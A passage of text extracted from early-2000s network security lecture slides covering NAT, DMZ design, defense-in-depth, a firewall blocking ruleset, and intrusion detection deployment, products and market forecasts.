• Developed in response to two major issues
• Hiding the network-addressing schema present
  behind a firewall environment.
• The depletion of the IP address space has caused
  some organizations to use NAT for mapping
  non-routable IP addresses to a smaller set of
  legal addresses, according to RFC 1918.
• 10.0.0.0 to 10.255.255.255 (Class A)
• 172.16.0.0 to 172.31.255.255 (Class B)
• 192.168.0.0 to 192.168.255.255 (Class C)
• Accomplished in three fashions
• Static Network Address Translation
• Port Address Translation (PAT)

149
IANA-allocated, Non-Internet routable IP address
IP address
Public
Private
American Registry for Internet Numbers (ARIN)
150
Static Network Address Translation
Each internal system on the private network has a
corresponding external, routable IP address
associated with it.
151
PAT
152
Personal Firewalls/Personal Firewall Appliances

• Personal Firewall
• Installed on the system it is meant to protect
• Usually do not offer protection to other systems
  or resources
• Personal Firewall Appliance
• Usually run on specialized hardware and integrate
  some other form of network infrastructure
  components
• Cable Modem WAN Routing,
• LAN Routing (dynamic routing support),
• Network hub,
• Network switch,
• DHCP (Dynamic Host Configuration Protocol)
  server,
• Network management (SNMP) agent, and
• Application-proxy agents.

153
DMZ (DeMilitarized Zone)

• A DMZ is your frontline when protecting valuables
  from direct exposure to an untrusted environment.
  
• "A network added between a protected network and
  an external network in order to provide an
  additional layer of security.
• A DMZ is sometimes called a "Perimeter network"
  or a "Three-homed perimeter network."
• A DMZ is a glowing example of the
  Defense-in-Depth principle.

154
Defense-in-Depth

• The Defense-in-Depth principle states that no one
  thing, no two things, will ever provide total
  security.
• It states that the only way for a system to be
  reasonably secured is to consider every aspect of
  the systems existence and secure them all.
• A DMZ is a step towards defense in depth because
  it adds an extra layer of security beyond that of
  a single perimeter.

155
Design DMZ

• Start by asking yourself
• what do I want to protect? Or
• what is most valuable to me?
• what is the entrance point into this system? Or
• what is my front door?
• If there are more than one entrance to your
  system such as an Internet connection and dial-up
  connections
• have two different DMZs.
• Have different configurations for each of those
  access types.

156
DMZ Networks
A DMZ Firewall Environment
Service Leg DMZ Configuration
157
Domain Name Service (DNS)
Split DNS example
158
Placement of Servers in Firewall Environments
Summary Example Firewall Environment
159
Firewall Ruleset Blocking Traffics

• Inbound traffic from a non-authenticated source
  system with a destination address of the firewall
  system itself.
• Inbound traffic with a source address indicating
  that the packet originated on a network behind
  the firewall.
• Inbound traffic containing ICMP (Internet Control
  Message Protocol) traffic.
• Inbound or Outbound traffic from a system using a
  source address that falls within the address
  ranges set aside in RFC 1918 as being reserved
  for private networks.
• Inbound traffic from a non-authenticated source
  system containing SNMP (Simple Network Management
  Protocol) traffic.
• Inbound traffic containing IP Source Routing
  information.
• Inbound or Outbound network traffic containing a
  source or destination address of 127.0.0.1
  (localhost).
• Inbound or Outbound network traffic containing a
  source or destination address of 0.0.0.0.
• Inbound or Outbound traffic containing directed
  broadcast addresses.

160
Network Intrusion Detection Systems
161
IDS History
http//www.securityfocus.com/infocus/1514
162
Types of IDS (Information Source)
http//www.networkintrusion.co.uk/ids.htm
163
Complement IDS Tools
Source http//www.icsalabs.com/html/communities/i
ds/buyers_guide/guide/index.shtml
164
IDS Life Cycle
Installation
165
IDS Market Forecast (I)
Source IDC, 2001
166
IDS Market Forecast (II)
Source IDC, 2001
167
When Firewall Meets IDS

• Validate firewall configuration
• Detect attacks but firewalls allow them to pass
  through (such as attacks against web servers).
• Seize insider hacking

• Access Control
• NAT
• Prevent the attacks

168
NIDS Deployments

• See all outside attacks to help forensic analysis

1

• Identify DMZ related attacks
• Spot outside attacks penetrate the network's
  perimeter
• Avoid outside attacks to IDS itself
• Highlight external firewall problems with the
  policy/performance
• Pinpoint compromised server via outgoing traffic

DMZ
2

• Increase the possibility to recognize attacks.
• Detect attacks from insider or authorized users
  within the security perimeter.

3

• Mode
• Tap
• SPAN (Mirror)
• Port Clustering
• In-Line

• Observe attacks on critical systems and resources
• Provide cost effective solutions

4
169
IDS Balancer

• Toplayers IDS Balancer
• Radware FireProof

GigaBit SX Tap
Fiber Tap

• Availability
• Scalability
• ROI
• Cost-effective (reduce sensors while increasing
  intrusion coverage)

170
Detection Engine Analysis
171
The Detection Results

• Annoy
• Crying wolf
• Tuning
• Prevention?

• Wire-speed performance
• Mis-configuration
• Poor detection engine
• IDS Evasion

172
IDS Responses After Detection
Passive Responses
Active Responses
Source NIST
173
Check Point - Open Platform for Secure Enterprise
Connectivity (OPSEC)
TCP/UDP Port Name Short description
18181 /tcp FW1_cvp Check Point OPSEC Content Vectoring Protocol - Protocol used for communication between FWM and AntiVirus Server
18182 /tcp FW1_ufp Check Point OPSEC URL Filtering Protocol - Protocol used for communication between FWM and Server for Content Control (e.g. Web Content)
18183 /tcp FW1_sam Check Point OPSEC Suspicious Activity Monitor API - Protocol e.g. for Block Intruder between MM and FWM
18184 /tcp FW1_lea Check Point OPSEC Log Export API - Protocol for exporting logs from MM
18185 /tcp FW1_omi Check Point OPSEC Objects Management Interface - Protocol used by applications having access to the ruleset saved at MM
18187 /tcp FW1_ela Check Point Event Logging API - Protocol used by applications delivering logs to MM
18207 /tcp FW1_pslogon Check Point Policy Server Logon protocol - Protocol used for download of Desktop Security from PS to SCl
NFR and RealSecure support FW-1_sam and FW1_ela
174
NIDS Market Predictions Head to Head

• By year end 2004, advances in non-signature
  based intrusion detection technology will enable
  network-based intrusion prevention to replace 50
  of established IDS deployments and capture 75 of
  new deployments.

• By end of 2003, 90 of IDS deployments will fail
  when false positives are not reduced by 50.

175
Gateway IDS (GIDS) and Host Intrusion Prevention
(HIP)
Company Website
Entercept Security Technologies www.entercept.com
Harris STAT Neutralizer www.statonline.com
Okena StormWatch and StormFront www.okena.com
Sana Security www.sanasecurity.com
Linux IDS www.lids.org
GIDS
Inadvertently block legitimate traffic
Company Website
Captus Networks www.captusnetworks.com
Cisco Systems IDS www.cisco.com
ForeScout ActiveScout www.forescout.com
RealSecure Network Protection www.iss.net
Intruvert Networks www.intruvert.com
NetScreen Technologies IDP www.netscreen.com
Snort Hogwash http//hogwash.sourceforge.net
TippingPoint Technologies UnityOne www.tippingpoint.com
HIP
Ineffective against denial-of-service attacks
OneSecure ? Netscreen Okena ? Cisco Entercept
and Intruvert ? Network Associates
http//www.cio.com/archive/061503/et_article.html